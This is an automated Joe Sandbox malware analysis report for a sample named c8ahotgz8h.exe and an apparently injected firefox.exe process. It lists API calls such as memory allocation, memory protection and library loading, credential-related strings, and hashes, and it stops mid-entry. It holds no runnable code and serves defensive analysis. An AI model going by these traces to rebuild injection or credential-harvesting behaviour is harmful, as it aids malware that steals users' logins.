Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6

Memory Dump Source

Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
Instruction ID: 7ce17dad6ccd79c83be7301ccbc40aedb5d830660609e3c5e0a217bbc79fa59c
Opcode Fuzzy Hash: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
Instruction Fuzzy Hash: 7611667160132A9BCF30AFA95AA43CB337AAFC8790FA5801BDC49DB600D7718D41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02293800, Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateProcess.KERNELBASE ref: 0229C1BE

Memory Dump Source

Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
Instruction ID: da2392900abf1338ace485c39df75b4200c675fc7f6a963f44f2862257977f40
Opcode Fuzzy Hash: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
Instruction Fuzzy Hash: 360142355A830A8BCF14AA3085823EDB7A0EE55360F964158CCD252019D32540CACF03

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: firefox.exe PID: 5640 Parent PID: 4624 firefox.exeCOMMON

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.5%
Total number of Nodes:	734
Total number of Limit Nodes:	24

Executed Functions

Function 000001BF400004B2, Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 288
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPrivateProfileSectionNamesW.KERNEL32 ref: 000001BF400006B3

Strings

2, xrefs: 000001BF400005B1
Pass, xrefs: 000001BF40000567
User, xrefs: 000001BF4000057B
L: , xrefs: 000001BF40000536
UR, xrefs: 000001BF4000052F
word, xrefs: 000001BF4000056E
name, xrefs: 000001BF40000582

Memory Dump Source

Source File: 00000019.00000002.50721296907.000001BF3FF00000.00000040.00020000.sdmp, Offset: 000001BF3FF00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_1bf3ff00000_firefox.jbxd

Similarity

API ID: NamesPrivateProfileSection
String ID: UR$2$L: $Pass$User$name$word
API String ID: 709140578-2058692283
Opcode ID: 2634d713e03c4249ea3ef125dc13a9036903a6f93b935f15d9626ba978a7b125
Instruction ID: 1f36059df53695bb8a53fdadea824b2c300289fb441fd6d8dac262f1a0b1ff63
Opcode Fuzzy Hash: 2634d713e03c4249ea3ef125dc13a9036903a6f93b935f15d9626ba978a7b125
Instruction Fuzzy Hash: 67A1B170A187488BEB28EF6CE8547EEB7E1FB48304F00462DE44AD7286DB7495468789

Uniqueness

Uniqueness Score: -1.00%

Function 000001BF40004D02, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 000001BF40004F19

Strings

`, xrefs: 000001BF40004EED

Memory Dump Source

Source File: 00000019.00000002.50721296907.000001BF3FF00000.00000040.00020000.sdmp, Offset: 000001BF3FF00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_1bf3ff00000_firefox.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: d77668096b18891c3cee839e8581402439719b55f2a783575009bfdf60917714
Instruction ID: 3882ceadf8e91f1d965d76954440f49dc27555a3f52e0010b54731e67ad0e745
Opcode Fuzzy Hash: d77668096b18891c3cee839e8581402439719b55f2a783575009bfdf60917714
Instruction Fuzzy Hash: 64224E70618A499FDB99EF2CD8957EAB7E1FB5C301F40022ED05ED3295DB30D4528B89

Uniqueness

Uniqueness Score: -1.00%

Function 000001BF40006762, Relevance: 1.6, APIs: 1, Instructions: 135
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000019.00000002.50721296907.000001BF3FF00000.00000040.00020000.sdmp, Offset: 000001BF3FF00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_1bf3ff00000_firefox.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1e992e853f5319a5e44a433e2df559e407adb8b6d37870ff715de64f33b6fb3
Instruction ID: b35c95077c38f9fb93d3de4ffa8e891ec4462dfdd46254ce6405786a3fecdc41
Opcode Fuzzy Hash: d1e992e853f5319a5e44a433e2df559e407adb8b6d37870ff715de64f33b6fb3
Instruction Fuzzy Hash: 80417F30214A444AFBA5BB3C5CA97EB72D2BB5C300F84463D980AD619BCF68D843835A

Uniqueness

Uniqueness Score: -1.00%

Function 000001BF400034E2, Relevance: 1.6, APIs: 1, Instructions: 53
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL ref: 000001BF4000355B

Memory Dump Source

Source File: 00000019.00000002.50721296907.000001BF3FF00000.00000040.00020000.sdmp, Offset: 000001BF3FF00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_1bf3ff00000_firefox.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: e15ec73648a025ceb5b3a15fe8fd4bd4c46c9f3de2ee994074a413c48c56ecde
Instruction ID: df0530d51b6ad1652310c995509517415a9f694fff11f7e11cb67003e0e90d85
Opcode Fuzzy Hash: e15ec73648a025ceb5b3a15fe8fd4bd4c46c9f3de2ee994074a413c48c56ecde
Instruction Fuzzy Hash: AA01B130608A084BE754E73CECA97EBB2D5FBDC305F40053EA84EC6194EB39D6428646

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: c8ahotgz8h.exe PID: 7504 Parent PID: 4644 c8ahotgz8h.exeCOMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	368
Total number of Limit Nodes:	6

Executed Functions

Function 022A0754, Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1433COMMON

Download Yara Rule

Strings

}#c, xrefs: 0229A819
U=b, xrefs: 0229B67C
yW^g, xrefs: 022A0D53
H+m, xrefs: 0229A66D
yW^g, xrefs: 022A0D58
Sm!|, xrefs: 022A0800

Memory Dump Source

Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: H+m$Sm!|$U=b$yW^g$yW^g$}#c
API String ID: 1029625771-3546614695
Opcode ID: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
Instruction ID: a5e7999bc3269b2950af3bffea668d7d1bfbea3289595030864100dc64e4db23
Opcode Fuzzy Hash: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
Instruction Fuzzy Hash: 04B2557161434ADFDF349E78CDA53EA37A2EF55390F95412ECC8A8B648D3358986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 022A06A2, Relevance: 13.5, APIs: 2, Strings: 5, Instructions: 1270
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

";Jm, xrefs: 0229BD2A
}#c, xrefs: 0229A819
U=b, xrefs: 0229B67C
H+m, xrefs: 0229A66D
EK], xrefs: 02291450

Memory Dump Source

Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: ";Jm$H+m$U=b$}#c$EK]
API String ID: 0-2571250244
Opcode ID: a86cf9d25562fe33b76fe462471da5fb8be8848fb057ab291227fd13d85f5952
Instruction ID: d0f6face05315e375920b6352cfc450eb35e99dbcea15917051ecd2ba327a6ae
Opcode Fuzzy Hash: a86cf9d25562fe33b76fe462471da5fb8be8848fb057ab291227fd13d85f5952
Instruction Fuzzy Hash: CEA2647161434A9FDF349E788DA53DE7BA2FF55350F55822ECC8A8B648D3348986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0229CE0C, Relevance: 12.0, APIs: 2, Strings: 4, Instructions: 1452COMMON

Download Yara Rule

Strings

}#c, xrefs: 0229A819
U=b, xrefs: 0229B67C
H+m, xrefs: 0229A66D
EK], xrefs: 02291450

Memory Dump Source

Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: H+m$U=b$}#c$EK]
API String ID: 1029625771-1197094480
Opcode ID: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
Instruction ID: d1ec68e43a0ce40026b042203d79788ef3b04a492b6a0fcad3c61eb422999de0
Opcode Fuzzy Hash: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
Instruction Fuzzy Hash: 73C2687161434A9FDF349E78CDA57EE37A2EF55390F95412ECC8A8B648D3348986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 022A322B, Relevance: 8.0, APIs: 1, Strings: 3, Instructions: 994
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

}#c, xrefs: 0229A819
U=b, xrefs: 0229B67C
H+m, xrefs: 0229A66D

Memory Dump Source

Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: H+m$U=b$}#c
API String ID: 0-2772983987
Opcode ID: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
Instruction ID: 106f6bca14348da9a695ba0758586648d3b52b6ca7768ea5abd02df1b0e4bee4
Opcode Fuzzy Hash: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
Instruction Fuzzy Hash: FD82437161434ADFDF349E78CDA53EE3BA2EF55390F958229CC8A8B258D3748585CB02

Uniqueness

Uniqueness Score: -1.00%

Function 022A2AD2, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 305
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

EK], xrefs: 02291450
);J, xrefs: 022A2D08

Memory Dump Source

Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: );J$EK]
API String ID: 0-1158390361
Opcode ID: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
Instruction ID: 8aef15a0f8dccc1228480d4f0edce6af3f790094f83c71f7a487d3ca2a9f4d95
Opcode Fuzzy Hash: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
Instruction Fuzzy Hash: CFB15930A14349CFDF38DEB4C9B43EA37A2EF55350F59416ACC8A8BA59D7319982CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0229C88B, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242
memorylibrarynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(8D05082D,?,-00000001EF38FF1E), ref: 0229CBC8
LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6

Strings

U=b, xrefs: 0229B67C

Memory Dump Source

Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: U=b
API String ID: 2616484454-117013522
Opcode ID: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
Instruction ID: 227d880e3932897dbe3dc2e449eaca24259683177a30928425fb41250dadf468
Opcode Fuzzy Hash: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
Instruction Fuzzy Hash: BC816D71A1035BDFCF349EA89DA43EA36B3EF99390F94013ADC499B258D7358A41CB11

Uniqueness

Uniqueness Score: -1.00%

Function 022A1161, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

EK], xrefs: 02291450

Memory Dump Source

Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: EK]
API String ID: 0-1532622298
Opcode ID: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
Instruction ID: eb2cbd250763272bcd8cf8e7208af8028c3c0dfd6f943d0961196a5626680773
Opcode Fuzzy Hash: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
Instruction Fuzzy Hash: 8861BB7161034A9FDF359EB48AA43DB37A6EF9A3A0F55441ECC4ACFA01D7718986CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0229FFED, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`, xrefs: 022A01E0

Memory Dump Source

Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
Instruction ID: ab16a663e764d3b5b77d7488a763370fffa0ceef89f64fd4858d85e8ca8b30dd
Opcode Fuzzy Hash: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
Instruction Fuzzy Hash: 0C519F7661075ACFCF745EA94E683DA33A3EFA13A0FDA402ACC4E9B504C7754A45CB41

Uniqueness

Uniqueness Score: -1.00%

Function 022A23E2, Relevance: 1.5, APIs: 1, Instructions: 43
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(-11417B1E,?,?,?,?,022A15C1,12BC0BD0,0229A728), ref: 022A24F5

Memory Dump Source

Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
Instruction ID: bb1b8697066ceadb776b78f72aee6ae3e4ba5e73982924afa458c612b805582e
Opcode Fuzzy Hash: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
Instruction Fuzzy Hash: 47017CB46143998FDF30CE68C8D87DA7695FB8D700F81412AAD4DAB305C6715E8ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0229BF1C, Relevance: 1.6, APIs: 1, Instructions: 137
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6

Memory Dump Source

Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
Instruction ID: 37d5f78019999084bcb4418b3882eed55cbc9909077be02d458d021af0fcdcc1
Opcode Fuzzy Hash: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
Instruction Fuzzy Hash: DA419A312243469FCF309EA849E03DB2262AF963B0F91431BCC69DB299D7718805C641

Uniqueness

Uniqueness Score: -1.00%

Function 0229BE04, Relevance: 1.6, APIs: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6

Memory Dump Source

Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
Instruction ID: 292291f4bb927259cb8b5658176dd009d981b48308af0990d109cd4c712adefc
Opcode Fuzzy Hash: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
Instruction Fuzzy Hash: 3A31BD75620359DBCF309FB459A43EA336AAF857A0F92011FDC46DB644D7718D80CB42

Uniqueness

Uniqueness Score: -1.00%

Function 0229C02C, Relevance: 1.6, APIs: 1, Instructions: 94
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6

Memory Dump Source

Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
Instruction ID: 9bd5ac7265987f9528bbeea21211f54dbab524748460cf85ec56f83096b7df04
Opcode Fuzzy Hash: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
Instruction Fuzzy Hash: A8318A726103199BCF30AE694E943DE27B7AFD9790FAA801BDC09DB204D77189468A51

Uniqueness

Uniqueness Score: -1.00%

Function 0229F3EE, Relevance: 1.6, APIs: 1, Instructions: 57
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6

Memory Dump Source

Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
Instruction ID: 7ce17dad6ccd79c83be7301ccbc40aedb5d830660609e3c5e0a217bbc79fa59c
Opcode Fuzzy Hash: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
Instruction Fuzzy Hash: 7611667160132A9BCF30AFA95AA43CB337AAFC8790FA5801BDC49DB600D7718D41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 02293800, Relevance: 1.5, APIs: 1, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateProcess.KERNELBASE ref: 0229C1BE

Memory Dump Source

Source File: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_2290000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
Instruction ID: da2392900abf1338ace485c39df75b4200c675fc7f6a963f44f2862257977f40
Opcode Fuzzy Hash: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
Instruction Fuzzy Hash: 360142355A830A8BCF14AA3085823EDB7A0EE55360F964158CCD252019D32540CACF03

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: c8ahotgz8h.exe PID: 6900 Parent PID: 4644 c8ahotgz8h.exeCOMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	368
Total number of Limit Nodes:	6

Executed Functions

Function 02330754, Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1433COMMON

Download Yara Rule

Strings

yW^g, xrefs: 02330D58
U=b, xrefs: 0232B67C
Sm!|, xrefs: 02330800
H+m, xrefs: 0232A66D
}#c, xrefs: 0232A819
yW^g, xrefs: 02330D53

Memory Dump Source

Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: H+m$Sm!|$U=b$yW^g$yW^g$}#c
API String ID: 1029625771-3546614695
Opcode ID: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
Instruction ID: b1e631e997f1e5b983ca126ad627f741e445e945af88eea5c0ef10efdbaaa96b
Opcode Fuzzy Hash: b25ad30a1668fc697cae4d556328b75ab030e8700c26f52e12ad15845b43da56
Instruction Fuzzy Hash: 3AB2457160435A9FDF349E38CDA53DA77B2EF55390F95812ECC8A8B644D3348A86CB42

Uniqueness

Uniqueness Score: -1.00%

Function 023306A2, Relevance: 13.5, APIs: 2, Strings: 5, Instructions: 1270
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

EK], xrefs: 02321450
U=b, xrefs: 0232B67C
H+m, xrefs: 0232A66D
";Jm, xrefs: 0232BD2A
}#c, xrefs: 0232A819

Memory Dump Source

Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: ";Jm$H+m$U=b$}#c$EK]
API String ID: 0-2571250244
Opcode ID: a86cf9d25562fe33b76fe462471da5fb8be8848fb057ab291227fd13d85f5952
Instruction ID: 4d603072ef41ef8bbf52810a3f9c0a4b842a433efe3cb83e906ced36bd5bd4c0
Opcode Fuzzy Hash: a86cf9d25562fe33b76fe462471da5fb8be8848fb057ab291227fd13d85f5952
Instruction Fuzzy Hash: C9A2547160434A9FDB349E38CDA57DA7BA2FF55350F55822EDC8A8B650D334898ACB02

Uniqueness

Uniqueness Score: -1.00%

Function 0232CE0C, Relevance: 12.0, APIs: 2, Strings: 4, Instructions: 1452COMMON

Download Yara Rule

Strings

EK], xrefs: 02321450
U=b, xrefs: 0232B67C
H+m, xrefs: 0232A66D
}#c, xrefs: 0232A819

Memory Dump Source

Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: H+m$U=b$}#c$EK]
API String ID: 1029625771-1197094480
Opcode ID: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
Instruction ID: 0effb6122d5953c3f6c13117bf4de3a9de4165bfad170a63b0196a1db49a8abf
Opcode Fuzzy Hash: 9c1266785c6c9d9e36aa5d864a4ddad85704eb102607fa07e707892b557e1af2
Instruction Fuzzy Hash: 3AC2557160434A9FDF349E38CDA17EA77A6EF55390F95812ECC8A8B654D3308986CB02

Uniqueness

Uniqueness Score: -1.00%

Function 0233322B, Relevance: 8.0, APIs: 1, Strings: 3, Instructions: 994
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

U=b, xrefs: 0232B67C
H+m, xrefs: 0232A66D
}#c, xrefs: 0232A819

Memory Dump Source

Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: H+m$U=b$}#c
API String ID: 0-2772983987
Opcode ID: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
Instruction ID: 5987f0eba92561251bc34043356abb768109f1b219b81218c327621bec622b2f
Opcode Fuzzy Hash: 2aef98ef99f011ee8b908cc3cde207ca856713a6bbfa09b22cf635480b570d91
Instruction Fuzzy Hash: 3282337160434A9FDF349E38CDA53EE77B2EF55390F95822ADC8A8B654D3308985CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02332AD2, Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 305
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

EK], xrefs: 02321450
);J, xrefs: 02332D08

Memory Dump Source

Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: );J$EK]
API String ID: 0-1158390361
Opcode ID: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
Instruction ID: bddfee98e0631a0a8c14874ddf4d4ae8604b7cf324e3ccad2c32dc3847579ab2
Opcode Fuzzy Hash: a4b92d3d0d7d265f08df846bb82963276782873b54e4a78cca23913e034de93d
Instruction Fuzzy Hash: CFB16A30A04349CFDF39AE34C9A43EA37A2EF55350F59815BCC8A8F655D7319A86CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0232C88B, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 242
memorylibrarynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtAllocateVirtualMemory.NTDLL(8D05082D,?,-00000001EF38FF1E), ref: 0232CBC8
LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,023204DF,16EF18E8,0232E3FE,00000000,0232042E), ref: 0232F4E6

Strings

U=b, xrefs: 0232B67C

Memory Dump Source

Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID: U=b
API String ID: 2616484454-117013522
Opcode ID: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
Instruction ID: 17541803de5646156348f29870006c12b70813cb80c97c1629d47c5ca7687a0e
Opcode Fuzzy Hash: c3e6492804730bdffc58052f636a2bff474bc7b25ae8e1f45e2bd308a4fdb406
Instruction Fuzzy Hash: 2D819EB1A0036ADFCF349E688DA43EE36B7EF95390F94013ADC499B254D7318A46CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02331161, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 216
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

EK], xrefs: 02321450

Memory Dump Source

Source File: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, Offset: 02320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_2320000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID:
String ID: EK]
API String ID: 0-1532622298
Opcode ID: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
Instruction ID: 6543cb1276ae5525a561991f300da7e25930ca315ebd69f690bbd8d6d85f5a31
Opcode Fuzzy Hash: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
Instruction Fuzzy Hash: 7B61BC716003499FDF359E748AA43DB37AAEF967A0F65441ECC8ACBA01D771C986CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0232FFED, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 171
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

`, xrefs: 023301E0

Memory Dump Source

